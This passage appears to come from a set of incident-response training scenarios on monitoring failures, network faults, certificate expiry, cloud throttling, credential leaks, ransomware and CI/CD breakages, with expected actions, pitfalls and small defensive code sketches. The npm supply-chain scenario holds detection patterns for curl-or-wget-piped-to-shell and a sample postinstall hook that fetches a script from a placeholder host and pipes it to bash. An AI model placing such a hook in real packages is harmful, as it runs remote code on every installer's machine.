- Assuming services are actually down because Prometheus says targets are DOWN
- Rolling back the entire network policy instead of surgically allowing the metrics port
- Not distinguishing between health check ports and metrics scrape ports in the policy
- Restarting services or pods unnecessarily because dashboards show no data

ir-scenario-023 — Grafana 🔴
During a real production incident, the Grafana dashboard shows flat-line zeros for all metrics. Engineers cannot see error rates, latency, or throughput. The root cause is that Prometheus ran out of disk space and its WAL is corrupted, so it stopped ingesting new samples. However, the Prometheus /metrics endpoint still returns HTTP 200 OK and its own up metric reads 1. No alerts are firing because Prometheus alerting rule evaluation also stopped when ingestion failed. The team is flying blind during an active incident.
Expected actions
- Check Prometheus pod logs for WAL corruption or disk space errors
- Verify Prometheus disk usage with df or kubectl exec into the pod
- Check the Prometheus TSDB status page (/api/v1/status/tsdb) for head block errors
- Expand the Prometheus PVC or clean old data to free disk space
- Restart Prometheus after freeing space to trigger WAL repair
- Use alternative data sources (application logs, kubectl top, cloud provider metrics) during the blind window
- After recovery, verify alerting rules are evaluating again by checking /api/v1/rules
- Add a meta-alert on prometheus_tsdb_head_samples_appended_total dropping to zero

Common pitfalls
- Trusting that Prometheus is healthy because its /metrics endpoint returns 200 OK
- Not realizing that alert evaluation stops when ingestion stops — the absence of alerts is itself the problem
- Spending time debugging Grafana datasource configuration when the issue is Prometheus storage
- Not having an out-of-band monitoring system that watches Prometheus itself

ir-scenario-024 — Loki 🔴¶
Loki log ingestion drops from 50,000 lines per second to zero after a new microservice deployment. Promtail agents are still running and shipping logs, but Loki is rejecting all writes with HTTP 429 "too many streams" errors. Investigation reveals the new deployment added request_id as a Loki label. With millions of unique request IDs, the label cardinality exploded and exceeded Loki's per-tenant stream limit. Existing services' logs are also being rejected because the stream limit is tenant-wide.
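The preventive fix this scenario leads to is a CI check that rejects logging configs using known high-cardinality fields as Loki labels. A minimal sketch, with an illustrative blocked-field list (a real policy would be maintained per team):

```python
# Hypothetical CI check: reject Loki label sets containing fields known
# to have unbounded cardinality. The blocked list is illustrative.
HIGH_CARDINALITY_FIELDS = {"request_id", "trace_id", "user_id", "session_id"}

def validate_loki_labels(labels):
    """Return the sorted subset of labels that violate the policy."""
    return sorted(set(labels) & HIGH_CARDINALITY_FIELDS)

violations = validate_loki_labels(["app", "namespace", "request_id"])
if violations:
    print(f"rejected: high-cardinality labels {violations}")
```

Fields like request_id still remain queryable as structured log fields parsed at query time; only their use as indexed labels is blocked.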
Expected actions
- Check Loki ingester logs for "too many active streams" or "per-tenant series limit" errors
- Identify which label is causing the cardinality explosion by querying Loki's /api/v1/series endpoint
- Roll back or fix the new deployment's Promtail/logging configuration to remove request_id as a label
- Move request_id from a label to a structured log field (parsed at query time, not indexed)
- Temporarily increase the per-tenant stream limit to restore ingestion for other services
- After fixing the label, wait for old high-cardinality streams to expire (based on retention)
- Add a CI check or admission webhook that rejects logging configs with known high-cardinality labels
- Document the label cardinality policy and which fields are allowed as labels vs structured fields

Common pitfalls
- Increasing stream limits without fixing the cardinality issue — this just delays the problem
- Not realizing the blast radius is tenant-wide — all services lose logs, not just the offending one
- Blaming Loki performance instead of investigating the label cardinality change
- Restarting Loki ingesters, which causes them to replay the WAL and hit the same limits again

ir-scenario-025 — Tracing 🟡¶
Tempo traces show a 100% error rate for a critical payment service, but application logs show no errors and the service is processing payments successfully. After a recent deployment, the OpenTelemetry SDK was misconfigured with the service name "payment-service-v2" instead of "payment-service". All new traces are being attributed to a non-existent service. The old service name shows no recent traces, making it look like the service stopped entirely. Alerts based on trace error rates are firing.
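The follow-up this scenario calls for is validating OTEL_SERVICE_NAME in CI against a service registry. A minimal sketch, with an illustrative registry:

```python
# Hypothetical CI validation: check a deployment's environment for an
# OTEL_SERVICE_NAME that exists in the service registry. Registry
# contents are illustrative.
KNOWN_SERVICES = {"payment-service", "checkout-service", "ledger-service"}

def validate_service_name(env):
    """Return an error string if OTEL_SERVICE_NAME is missing or unknown."""
    name = env.get("OTEL_SERVICE_NAME")
    if name is None:
        return "OTEL_SERVICE_NAME is not set"
    if name not in KNOWN_SERVICES:
        return f"unknown service name {name!r} (typo or unregistered?)"
    return None

print(validate_service_name({"OTEL_SERVICE_NAME": "payment-service-v2"}))
```

A check like this would have caught "payment-service-v2" before the deploy rather than after the false-positive pages.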
Expected actions
- Query Tempo for traces with the new service name to confirm they exist and are healthy
- Compare the service name in the OpenTelemetry SDK configuration against the expected name
- Check the deployment manifests or environment variables for the OTEL_SERVICE_NAME setting
- Fix the service name in the configuration and redeploy
- Update dashboards and alerts to be resilient to service name changes or add service name validation
- Verify traces appear under the correct service name after the fix
- Suppress the false-positive error rate alerts with an annotation explaining the root cause
- Add a CI check that validates OTEL_SERVICE_NAME against an allowed service registry

Common pitfalls
- Assuming the service is actually failing because traces show errors
- Investigating application code for bugs when the issue is SDK configuration
- Not checking traces under alternative service names in Tempo
- Rolling back the deployment unnecessarily when only the tracing config needs fixing

ir-scenario-026 — Alerting Rules 🟡¶
A Prometheus alerting rule for PodCPUThrottled with severity=warning fires over 200 times per day. The on-call team muted it months ago because it was too noisy to act on. A real CPU bottleneck develops in a critical service causing request timeouts and degraded user experience. The alert fires but is permanently silenced in Alertmanager. The incident goes undetected for 6 hours until users report slowness. Investigation reveals the silenced alert had been firing for the affected service the entire time.
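The silence-hygiene audit this scenario motivates can be sketched as plain logic: flag any silence older than a cutoff. The silence records below are dicts shaped loosely like Alertmanager API output (an assumption); fetching them from the API is left out.

```python
# Sketch of a silence-hygiene audit: flag silences active longer than a
# cutoff so they get tuned rather than forgotten. Record shape is a
# simplification of Alertmanager's silence objects.
from datetime import datetime, timedelta, timezone

MAX_SILENCE_AGE = timedelta(days=7)

def stale_silences(silences, now=None):
    """Return IDs of silences active longer than MAX_SILENCE_AGE."""
    now = now or datetime.now(timezone.utc)
    return [s["id"] for s in silences if now - s["created_at"] > MAX_SILENCE_AGE]

now = datetime(2024, 6, 10, tzinfo=timezone.utc)
silences = [
    {"id": "sil-1", "created_at": datetime(2024, 3, 1, tzinfo=timezone.utc)},
    {"id": "sil-2", "created_at": datetime(2024, 6, 8, tzinfo=timezone.utc)},
]
print(stale_silences(silences, now=now))  # ['sil-1']
```

Pairing this with the policy that every silence needs an expiry and a linked ticket keeps "temporarily muted" from becoming permanent.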
Expected actions
- Immediately triage the active CPU bottleneck — check resource usage, scale up, or increase CPU limits
- Remove the blanket silence on PodCPUThrottled and replace with targeted suppressions
- Tune the alerting rule to reduce noise — increase the threshold, add a for duration, or filter by namespace
- Split the alert into warning (broad, lower urgency) and critical (narrow, pages on-call) tiers
- Add a meta-alert that fires when any alert has been silenced for more than 7 days
- Review all other silenced alerts in Alertmanager for similar risks
- Establish a policy that silences must have an expiry and a linked ticket for the tuning work
- Post-incident, calculate the cost of the 6-hour detection gap and use it to justify alert hygiene

Common pitfalls
- Simply un-muting the noisy alert without tuning it — the team will mute it again
- Deleting the alerting rule instead of fixing the threshold and conditions
- Not checking for other silenced alerts that may be hiding real problems
- Blaming the on-call team for muting instead of fixing the systemic alert quality issue

ir-scenario-027 — BGP 🔴¶
The BGP session between two core routers keeps flapping every 3 to 5 minutes. The BGP hold timer is set to 90 seconds and keepalives are sent every 30 seconds. The management interface on one router is congested because a monitoring system is polling SNMP MIBs aggressively, delaying BGP keepalive packets beyond the hold timer threshold. Each time the session drops, the route table oscillates, causing intermittent packet loss across the entire /16 subnet. Dozens of services experience brief outages every few minutes.
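The timer arithmetic behind this scenario is worth making explicit: with a 90-second hold timer and 30-second keepalives, roughly two consecutive keepalives can be lost or delayed before the session drops. A back-of-envelope sketch:

```python
# Back-of-envelope BGP timer math (a rough model, not a protocol
# implementation): how many consecutive keepalives can be missed before
# the hold timer expires?

def tolerable_keepalive_losses(hold_time_s, keepalive_interval_s):
    """Approximate count of keepalives that can be missed in a row."""
    return hold_time_s // keepalive_interval_s - 1

print(tolerable_keepalive_losses(90, 30))   # 2
print(tolerable_keepalive_losses(120, 30))  # 3
```

This is why management-plane congestion delaying keepalives by a minute or more is enough to flap the session on a 3:1 keepalive-to-hold ratio.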
Expected actions
- Identify the flapping BGP session from router logs or monitoring (show bgp summary)
- Check BGP neighbor state transitions and hold timer expiry events in the router log
- Investigate why keepalives are being delayed — check the management interface utilization
- Identify the SNMP polling traffic saturating the management plane and reduce poll frequency
- Separate BGP session traffic from management traffic using a dedicated interface or loopback
- Consider increasing the BGP hold timer temporarily to stop the flapping while root-causing
- Verify route table stability after the fix by monitoring BGP update counts
- Add monitoring for management interface utilization and BGP session flap rate

Common pitfalls
- Increasing hold timers as a permanent fix without addressing the management plane congestion
- Restarting the BGP process, which causes a full route withdrawal and reconvergence
- Not correlating the flapping interval with the hold timer value to identify the timing issue
- Overlooking that management plane congestion affects control plane protocols like BGP

ir-scenario-028 — STP / Spanning Tree 🔴¶
A new switch was added to the datacenter network and within 30 seconds the entire VLAN went down. STP (Spanning Tree Protocol) was disabled on the new switch because the vendor shipped it with STP off by default. The switch created a Layer 2 loop causing a broadcast storm. All other switches on the VLAN see their CPU spike to 100% processing broadcast frames. Management access to the switches is lost because the management VLAN shares the same broadcast domain. Physical access to the datacenter requires a 20-minute drive.
Expected actions
- Immediately identify the last change — correlate the VLAN outage with the new switch installation
- If remote access is lost, physically disconnect the new switch's uplink cables as the fastest fix
- If any remote access remains, shut the ports connecting to the new switch from the upstream switch
- Once the loop is broken, verify VLAN traffic and switch CPU levels return to normal
- Enable STP (RSTP or MSTP) on the new switch before reconnecting it
- Enable BPDU Guard and Root Guard on all access ports to prevent future rogue switches
- Configure storm control thresholds on all switch ports to limit broadcast traffic
- Add a pre-deployment checklist that verifies STP is enabled before connecting any new switch

Common pitfalls
- Rebooting other switches on the VLAN which will not fix the loop and causes further disruption
- Not physically disconnecting the offending switch if remote access is already lost
- Re-enabling STP on the new switch while it is still connected, which may cause temporary reconvergence issues
- Assuming the broadcast storm is a DDoS attack and engaging the security team instead of checking L2

ir-scenario-029 — TLS & PKI 🟡¶
At 2 AM Saturday, internal service-to-service HTTPS calls start failing with TLS handshake errors. The wildcard certificate for *.internal.company.com expired 2 hours ago. The cert was manually installed on a load balancer 13 months ago and was never added to cert-manager or any automated renewal system. Monitoring did not alert because the certificate expiry check only runs against the public-facing domain *.company.com, not the internal wildcard. Dozens of internal microservices cannot communicate.
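The tiered expiry alerting this scenario argues for reduces to simple threshold logic once a certificate's notAfter date is known. A minimal sketch (fetching notAfter, e.g. via openssl s_client, is left out):

```python
# Pure threshold logic for tiered certificate-expiry alerting: given a
# certificate's notAfter timestamp, report which warning tiers have been
# crossed. Thresholds mirror the 30/14/3-day tiers in this scenario.
from datetime import datetime, timedelta, timezone

THRESHOLDS = (30, 14, 3)  # days before expiry

def crossed_thresholds(not_after, now=None):
    now = now or datetime.now(timezone.utc)
    days_left = (not_after - now).days
    return [d for d in THRESHOLDS if days_left <= d]

now = datetime(2024, 1, 1, tzinfo=timezone.utc)
expiry = now + timedelta(days=10)
print(crossed_thresholds(expiry, now=now))  # [30, 14]
```

The non-obvious part is coverage, not logic: the check has to run against every certificate in the inventory, including internal wildcards, or the blind spot recurs.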
Expected actions
- Confirm the root cause by checking the certificate expiry date on the load balancer (openssl s_client)
- Issue an emergency replacement certificate — use an internal CA or request an expedited cert
- Install the new certificate on the load balancer and reload the TLS configuration
- Verify service-to-service calls resume by checking application health endpoints
- Add the internal wildcard domain to the certificate monitoring system immediately
- Migrate the certificate to cert-manager or an automated renewal pipeline
- Audit all other manually installed certificates for similar expiry blind spots
- Set up alerts at 30-day, 14-day, and 3-day expiry thresholds for all certificates

Common pitfalls
- Trying to renew through the original manual process at 2 AM when the issuing portal may be unavailable
- Disabling TLS verification on services as a workaround, which creates a security vulnerability
- Only fixing the expired cert without auditing other manually managed certificates
- Not adding internal domains to monitoring — the same blind spot will recur with the next internal cert

ir-scenario-030 — Cloud Deep Dive 🔴¶
AWS API calls from an application start returning 503 Service Unavailable with a ThrottlingException error. The application's retry logic uses aggressive exponential backoff starting at 100ms with no jitter, causing synchronized retry storms that make the throttling worse. Other applications sharing the same AWS account also begin failing because they share the account-level API rate limits. The blast radius expands from one service to the entire account within minutes.
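The fix for the synchronized retry storm is exponential backoff with full jitter, the pattern AWS recommends: each retry sleeps a uniform random amount between zero and an exponentially growing cap, so clients de-synchronize instead of hammering the API in lockstep. A minimal sketch:

```python
# Exponential backoff with full jitter: the sleep before retry N is
# uniform in [0, min(cap, base * 2**N)]. Randomness breaks the
# synchronized retry waves described in this scenario.
import random

def backoff_with_full_jitter(attempt, base_s=0.1, cap_s=30.0):
    """Sleep duration (seconds) for the given retry attempt (0-based)."""
    ceiling = min(cap_s, base_s * (2 ** attempt))
    return random.uniform(0, ceiling)

for attempt in range(5):
    cap = min(30.0, 0.1 * 2 ** attempt)
    print(f"attempt {attempt}: up to {cap:.1f}s,"
          f" chose {backoff_with_full_jitter(attempt):.3f}s")
```

Compare this with the scenario's broken client: a fixed 100 ms start with no jitter means every client retries at the same instants, amplifying the throttling.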
Expected actions
- Identify which AWS API calls are being throttled from CloudTrail or application logs
- Reduce the call rate on the offending application immediately — disable non-critical features or batch requests
- Add jitter to the retry logic to break the synchronized retry storm pattern
- Implement exponential backoff with full jitter as per AWS best practices
- Request a rate limit increase from AWS support for the specific API if the baseline rate is too low
- Separate high-volume API callers into dedicated AWS accounts to isolate rate limits
- Add client-side rate limiting or token bucket throttling before calls hit the AWS API
- Monitor API throttling metrics (AWS/Usage namespace) and alert before hitting limits

Common pitfalls
- Retrying aggressively without jitter, which amplifies the thundering herd problem
- Not realizing that API rate limits are shared at the account level across all applications
- Only fixing the one application without addressing the shared-account blast radius
- Requesting a rate limit increase without first optimizing the call pattern

ir-scenario-031 — Terraform 🔴¶
A Terraform apply deleted a production RDS instance with 2 TB of customer data. An engineer ran terraform destroy on what they believed was the dev workspace but was actually the prod workspace. The Terraform state file confirmed the target was production. The RDS instance had deletion protection disabled because it was marked as "temporary" six months ago and never re-protected. Automated backups have a 7-day retention but the most recent snapshot is 18 hours old.
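One guardrail that would have stopped this: a pre-apply pipeline step that scans the JSON plan (terraform show -json plan) for delete actions on protected resource types and fails the run. A minimal sketch; the protected-type list is an assumption for illustration:

```python
# Sketch of a pre-apply guard over Terraform's JSON plan format: fail if
# any protected resource type would be deleted. Plan structure follows
# `terraform show -json`; the protected list is illustrative.
import json

PROTECTED_TYPES = {"aws_db_instance", "aws_s3_bucket"}

def destructive_changes(plan_json):
    """Return addresses of protected resources the plan would delete."""
    plan = json.loads(plan_json)
    return [
        rc["address"]
        for rc in plan.get("resource_changes", [])
        if rc["type"] in PROTECTED_TYPES
        and "delete" in rc["change"]["actions"]
    ]

plan = json.dumps({"resource_changes": [
    {"address": "aws_db_instance.prod", "type": "aws_db_instance",
     "change": {"actions": ["delete"]}},
    {"address": "aws_instance.web", "type": "aws_instance",
     "change": {"actions": ["delete"]}},
]})
print(destructive_changes(plan))  # ['aws_db_instance.prod']
```

This complements, rather than replaces, lifecycle prevent_destroy and RDS deletion protection: defense in depth against a wrong-workspace destroy.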
Expected actions
- Immediately check RDS automated backups and find the most recent snapshot
- Restore the RDS instance from the latest automated snapshot to a new instance
- Assess the 18-hour data gap — check binlog or application logs for transactions that can be replayed
- Point the application to the restored instance and verify data integrity
- Enable deletion protection on the restored instance immediately
- Add lifecycle prevent_destroy in the Terraform configuration for all production databases
- Require workspace confirmation prompts or use separate state backends per environment
- Implement an SCP or IAM policy that denies rds:DeleteDBInstance without MFA on production accounts

Common pitfalls
- Panicking and running terraform apply again, which may create a new empty database
- Not checking for automated backups before assuming the data is gone
- Restoring to the same instance name while Terraform state is in a conflicted state
- Not enabling deletion protection on the restored instance, leaving it vulnerable to the same mistake
- Treating the 18-hour-old backup as complete without reconciling the gap

ir-scenario-032 — Security 🔴¶
Your SIEM fires an alert: a GitHub personal access token belonging to a senior engineer was found in a public paste site by an automated secret scanner. The token has repo and admin:org scopes. The token was created 18 months ago and was last used legitimately 6 hours ago. GitHub audit logs show no unusual repository clones or webhook modifications yet, but the paste was posted 45 minutes ago. The engineer is currently offline and unreachable.
Expected actions
- Immediately revoke the exposed GitHub PAT via the organization admin panel
- Review GitHub audit logs for any activity from the token in the last hour, especially repo clones, new deploy keys, or webhook changes
- Check if the token was used to modify any GitHub Actions workflows that could introduce backdoors
- Audit all repositories the token had access to for unauthorized commits or branch protection changes
- Rotate any secrets stored in repositories that the token could access
- Enable or verify that IP-based access restrictions are in place for the GitHub organization
- Create a new token with minimum required scopes when the engineer is back online
- File a security incident report and review PAT creation policies (expiration, scope limits)

Common pitfalls
- Waiting for the engineer to come online before revoking — every minute the token is live is exposure
- Only checking for repo clones and missing webhook or Actions workflow modifications
- Not auditing downstream secrets that the token holder could have accessed
- Revoking the token without notifying CI/CD systems that may depend on it, causing a secondary outage

ir-scenario-033 — Security 🔴¶
The security team receives an alert from endpoint detection software on a production jump host. A process is encrypting files in /var/lib/ and appending a .locked extension. CPU utilization on the host has spiked to 100%. The process is running as the deploy user, which has SSH access to 12 other production servers. No ransom note has appeared yet but the pattern matches known ransomware behavior. The jump host serves as the only bastion for production SSH access.
Expected actions
- Immediately isolate the jump host from the network (disable network interface or security group) to prevent lateral movement
- Kill the encrypting process and preserve a memory dump for forensic analysis
- Revoke or rotate SSH keys for the deploy user on all 12 servers it can reach
- Check the 12 downstream servers for signs of compromise or similar encryption activity
- Assess the damage on the jump host — identify which files were encrypted and whether backups exist
- Establish an alternative SSH access path (temporary bastion or VPN) so production operations can continue
- Investigate the initial access vector — how did the attacker get execution as the deploy user
- Engage the security incident response team and consider involving law enforcement if confirmed ransomware

Common pitfalls
- Shutting down the host instead of isolating it — this destroys volatile forensic evidence in memory
- Focusing only on the jump host while the attacker moves laterally to the 12 other servers
- Restoring from backups without understanding the initial access vector, leading to reinfection
- Not establishing alternative production access before isolating the bastion, causing an operational lockout

ir-scenario-034 — Security 🟡¶
CloudTrail logs show that an IAM user with AdministratorAccess made 47 API calls from an IP address in a country where your company has no employees or infrastructure. The calls include CreateUser, AttachUserPolicy, and CreateAccessKey. The legitimate user confirms they did not make these calls and last logged in from the office IP 3 days ago. MFA was not enabled on this account.
Expected actions
- Immediately disable the compromised IAM user's access keys and console password
- Delete any IAM users, access keys, or policies created by the unauthorized session
- Review CloudTrail for the full scope of actions taken — check for Lambda functions, EC2 instances, or S3 bucket policy changes
- Check for persistence mechanisms — new IAM roles with trust policies, Lambda backdoors, or EC2 instances in unusual regions
- Rotate credentials for any services or resources the compromised user could access
- Enable MFA on all IAM users with console access and enforce it via SCP
- Investigate how the credentials were compromised (phishing, leaked, credential stuffing)
- Review and reduce the scope of AdministratorAccess — apply least privilege

Common pitfalls
- Only disabling the compromised user without checking for newly created persistence accounts
- Not checking all AWS regions for resources created by the attacker
- Rotating the compromised user's credentials but not the downstream service credentials they could access
- Treating this as resolved after cleanup without investigating the initial compromise vector

ir-scenario-035 — Security 🔴¶
Your dependency scanning tool flags that a widely-used internal npm package (@company/auth-utils v2.3.1) was published 6 hours ago by a developer who left the company two weeks ago. The package includes a new postinstall script that curls an external URL and pipes to bash. The package has already been installed by 8 CI pipelines that build production services. The npm registry is self-hosted on Artifactory.
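A registry-side scan for the attack pattern in this scenario, lifecycle scripts that fetch and execute remote code, can be sketched as a small check over package.json. The patterns below are illustrative, not exhaustive:

```python
# Sketch of a scan for suspicious npm install hooks: flag lifecycle
# scripts that pipe a download into a shell. Patterns are illustrative
# (a real scanner would cover many more evasion variants).
import json
import re

SUSPICIOUS = [
    re.compile(r"curl[^|;&]*\|\s*(ba)?sh"),  # curl ... | bash / sh
    re.compile(r"wget[^|;&]*\|\s*(ba)?sh"),  # wget ... | bash / sh
]
HOOKS = ("preinstall", "install", "postinstall")

def suspicious_hooks(package_json):
    """Return the lifecycle hooks whose scripts match a known-bad pattern."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts", {})
    return [
        hook for hook in HOOKS
        if any(p.search(scripts.get(hook, "")) for p in SUSPICIOUS)
    ]

pkg = json.dumps({"scripts": {
    "postinstall": "curl -s https://example.invalid/x.sh | bash",
    "test": "jest",
}})
print(suspicious_hooks(pkg))  # ['postinstall']
```

Pattern matching is only a first line of defense; the sturdier controls are the ones listed below, such as revoking publish rights when employees leave and running installs with scripts disabled where possible.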
Expected actions
- Immediately unpublish or quarantine the compromised package version from Artifactory
- Revoke the departed developer's Artifactory credentials and audit all their recent publish actions
- Identify all 8 services that installed the compromised version and assess whether the postinstall script executed
- Inspect the external URL payload to understand what the script downloaded and executed
- Rebuild all affected services from clean dependencies, pinning to the last known-good version
- Rotate all secrets accessible to the 8 CI pipelines (service accounts, deploy keys, environment variables)
- Audit Artifactory access controls — implement publishing restrictions requiring active employee status
- Check production deployments of the 8 services for indicators of compromise

Common pitfalls
- Assuming the postinstall script did not execute because the build "looked normal"
- Unpublishing the package without preserving a copy for forensic analysis
- Only rotating CI secrets without checking if the payload exfiltrated secrets to the external URL
- Not auditing other packages the departed developer had publish access to

ir-scenario-036 — Security 🟡¶
Your CDN provider reports a volumetric DDoS attack targeting your primary API endpoint. Traffic has spiked from a baseline of 2,000 requests per second to 850,000 requests per second. The attack is a mix of HTTP GET floods and slowloris connections. Your origin servers are responding with increasing latency (p99 jumped from 200ms to 12 seconds). Legitimate users are experiencing timeouts. The attack appears to originate from a botnet spread across 40+ countries.
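Rate limiting at the edge usually comes down to a token bucket: admit a request only if a token is available, with tokens refilling at a fixed rate up to a burst capacity. A minimal in-process sketch (parameters are illustrative; CDN products implement this for you at scale):

```python
# Minimal token bucket: capacity `burst` tokens, refilled at
# `rate_per_s`. Each admitted request consumes one token.
import time

class TokenBucket:
    def __init__(self, rate_per_s, burst):
        self.rate = rate_per_s
        self.capacity = burst
        self.tokens = float(burst)
        self.last = time.monotonic()

    def allow(self):
        now = time.monotonic()
        # Refill proportionally to elapsed time, capped at capacity.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

bucket = TokenBucket(rate_per_s=2, burst=5)
results = [bucket.allow() for _ in range(8)]
print(results)  # first 5 admitted (burst), later calls rejected until refill
```

The burst parameter is what separates legitimate traffic spikes from a sustained flood: real users burst briefly, a GET flood exhausts the bucket and stays rejected.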
Expected actions
- Enable CDN-level rate limiting and bot detection rules if not already active
- Activate DDoS protection features (e.g., AWS Shield Advanced, Cloudflare Under Attack mode)
- Configure origin shield or caching to reduce requests reaching the origin
- Identify and block attack patterns — common User-Agent strings, request paths, or header fingerprints
- Scale origin infrastructure horizontally if possible to absorb residual traffic
- Set up geo-blocking only if the botnet has identifiable geographic concentration and legitimate users are not in those regions
- Monitor origin health and implement circuit breakers to prevent cascade failures
- Communicate status to affected users via status page and alternative channels

Common pitfalls
- Blocking by country when the botnet spans 40+ countries — this blocks legitimate users without stopping the attack
- Scaling origin servers without CDN-level mitigation, which just increases cost without solving the problem
- Not distinguishing between attack traffic and legitimate traffic, leading to blocking real users
- Waiting for the attack to stop on its own — DDoS attacks can persist for hours or days

ir-scenario-037 — CI/CD 🟡¶
Your CI/CD pipeline has been failing for all teams for the past 30 minutes. The Jenkins controller is running but all build agents show "offline." The agents are running on an auto-scaling group of EC2 instances. CloudWatch shows the ASG scaled to 0 instances 35 minutes ago. The ASG launch template references an AMI that was deregistered yesterday as part of a routine cleanup. No one can deploy, and there is a critical hotfix waiting for production deployment.
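The cleanup pre-check this scenario calls for reduces to a set difference: before deregistering, remove any AMI still referenced by a launch template. A minimal sketch; in practice both sets would come from the EC2 API (describe-launch-template-versions, describe-images):

```python
# Sketch of an AMI cleanup pre-check: only deregister candidates that no
# launch template still references. Inputs are plain lists here; a real
# script would pull them from the EC2 API.

def safe_to_deregister(candidate_amis, referenced_amis):
    """Candidates minus anything still referenced, sorted for stable output."""
    return sorted(set(candidate_amis) - set(referenced_amis))

print(safe_to_deregister(
    ["ami-old1", "ami-old2", "ami-ci-agent"],
    ["ami-ci-agent"],
))  # ['ami-old1', 'ami-old2']
```

The same pattern generalizes to any cleanup job: enumerate live references first, then delete only the complement.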
Expected actions
- Identify the root cause — the ASG launch template references a deregistered AMI
- Update the launch template to point to the current valid AMI
- Manually scale up the ASG to restore build agents
- For the critical hotfix, consider a manual deployment path while CI recovers
- Verify agents come online and reconnect to Jenkins
- Implement AMI lifecycle policies that check for active references before deregistering
- Add monitoring for ASG desired vs. actual count divergence
- Post-incident, add the AMI dependency to the cleanup script's pre-check

Common pitfalls
- Trying to restart Jenkins when the problem is infrastructure, not the controller
- Manually launching EC2 instances outside the ASG, creating configuration drift
- Deploying the hotfix manually without any CI validation, potentially shipping broken code
- Not adding safeguards to prevent the same AMI cleanup issue from recurring

ir-scenario-038 — CI/CD 🔴¶
A deployment to production completed successfully according to the pipeline, but users report that the new version has a critical bug — the payment processing endpoint returns 500 errors for all requests. The deployment used a blue-green strategy with automated health checks. The health check endpoint (GET /health) returns 200 on the new version, but the payment endpoint requires a database migration that was supposed to run as a pre-deploy hook but silently failed. The old database schema is incompatible with the new code.
Expected actions
- Immediately roll back to the previous (blue) version to restore payment processing
- Verify that the rollback resolves the 500 errors before doing anything else
- Investigate why the database migration pre-deploy hook failed silently
- Check the migration logs to understand what went wrong and whether a partial migration occurred
- If the migration partially applied, assess whether a rollback migration is needed for the old code to work
- Fix the deployment pipeline to fail the deployment if pre-deploy hooks fail
- Add deeper health checks that verify critical paths (not just GET /health but POST /payments with a test transaction)
- Re-attempt the deployment with the migration fix after thorough staging validation

Common pitfalls
- Running the database migration manually on production without understanding why it failed
- Not checking whether a partial migration makes the rollback version also broken
- Relying on the same shallow health check that missed the problem in the first place
- Pushing a "quick fix" forward instead of rolling back, extending the outage

ir-scenario-039 — CI/CD 🟡¶
Your container registry (Harbor) is returning HTTP 500 errors on all image pull requests. All Kubernetes deployments that attempt to pull new images or restart pods are failing with ImagePullBackOff. Existing running pods are unaffected. Harbor is backed by an S3-compatible object store (MinIO). MinIO dashboard shows one of three nodes is offline with a disk failure. Harbor's garbage collection job started 2 hours ago and is still running.
Expected actions
- Check MinIO cluster health — with one node down, verify whether the cluster has quorum for reads
- Stop Harbor's garbage collection job, which may be holding locks or causing excessive I/O on the degraded cluster
- Restart Harbor services after stopping GC to clear any cached error states
- Replace the failed MinIO disk or node to restore full redundancy
- Verify image pulls work after the restart by testing a known-good image
- For immediate relief, consider configuring image pull fallback to a mirror registry if one exists
- Ensure running deployments have imagePullPolicy set appropriately to avoid unnecessary pulls
- Add monitoring for MinIO node health and Harbor GC completion status

Common pitfalls
- Restarting Harbor repeatedly without addressing the underlying MinIO degradation
- Not stopping the GC job, which continues stressing the degraded storage backend
- Attempting to rebuild or re-push images while the registry is unstable
- Ignoring the disk failure as "MinIO handles it" without verifying erasure coding can tolerate the loss

ir-scenario-040 — CI/CD 🟡¶
A rollback was triggered after a canary deployment showed elevated error rates. However, the rollback itself failed — the previous container image tag (v2.8.3) was overwritten in the registry by the current broken build (v2.8.4) due to a tagging pipeline bug that re-tagged the latest image as both v2.8.4 and v2.8.3. Kubernetes is now pulling the broken image for both the "current" and "rollback" versions. Users are experiencing errors and you cannot roll back to a known-good state.
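The structural fix here is digest pinning: tags are mutable pointers, while a sha256 digest identifies exact image content. A deploy-time validation can be sketched as a simple check on the image reference format:

```python
# Sketch of a deploy-time validation: require container image references
# to pin an immutable sha256 digest instead of a mutable tag.
import re

DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")

def is_digest_pinned(image_ref):
    """True if the image reference ends in a full sha256 digest."""
    return bool(DIGEST_RE.search(image_ref))

for ref in (
    "registry.example.com/app:v2.8.3",               # mutable tag
    "registry.example.com/app@sha256:" + "ab" * 32,  # pinned digest
):
    print(ref, "->", "pinned" if is_digest_pinned(ref) else "mutable")
```

Had the rollback manifest referenced v2.8.3 by digest, the re-tagging bug could not have swapped the broken image underneath it.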
Expected actions
- Check if the original v2.8.3 image digest is still available in the registry (tags are mutable, digests are not)
- If the digest exists, update the deployment to reference the image by digest rather than tag
- If the digest is garbage-collected, rebuild v2.8.3 from the git tag and push it under a new unique tag
- Once a known-good image is running, verify the fix by checking error rates and health endpoints
- Fix the tagging pipeline to prevent tag overwrites — use immutable tags or digest-based deployments
- Implement registry policies that prevent overwriting existing tags
- Add a pre-rollback validation step that verifies the rollback image digest matches expectations
- Audit the registry for other images that may have been incorrectly re-tagged

Common pitfalls
- Repeatedly attempting rollback by tag without realizing both tags point to the same broken image
- Rebuilding from source without verifying you are building the correct git commit
- Not implementing immutable tags, leaving the same vulnerability for future rollbacks
- Assuming the registry always preserves old images — garbage collection may have already removed the original layers

ir-scenario-041 — Cloud 🔴¶
Your primary AWS region (us-east-1) is experiencing a major outage affecting EC2, RDS, and ELB services. Your application is deployed in a single region with no cross-region failover. Status page shows the outage is expected to last 2-4 hours. You have RDS automated backups with cross-region replication enabled to us-west-2. Your infrastructure is defined in Terraform but has never been deployed to another region. Customers are completely down.
Expected actions
- Assess the scope — determine which services are affected and whether partial functionality is possible
- Communicate to customers with an honest timeline based on AWS status page information
- If the outage is expected to be short (under 1 hour), consider waiting rather than attempting a risky cross-region failover
- If proceeding with failover, deploy core infrastructure to us-west-2 using Terraform with region-specific variable overrides
- Restore RDS from the cross-region replica or latest cross-region backup
- Update DNS records to point to the new region's load balancer (ensure TTL is considered)
- Verify data consistency after RDS restore — check replication lag at time of outage
- Plan and execute failback to us-east-1 once the outage is resolved, reconciling any data written to us-west-2

Common pitfalls
- Attempting an untested cross-region failover under pressure, potentially creating a second outage
- Not accounting for region-specific resources (AMI IDs, VPC peering, service endpoints) in the Terraform config
- Failing back to us-east-1 without reconciling data written during the failover period
- Not turning this incident into a project to implement proper multi-region architecture

ir-scenario-042 — Cloud 🟡¶
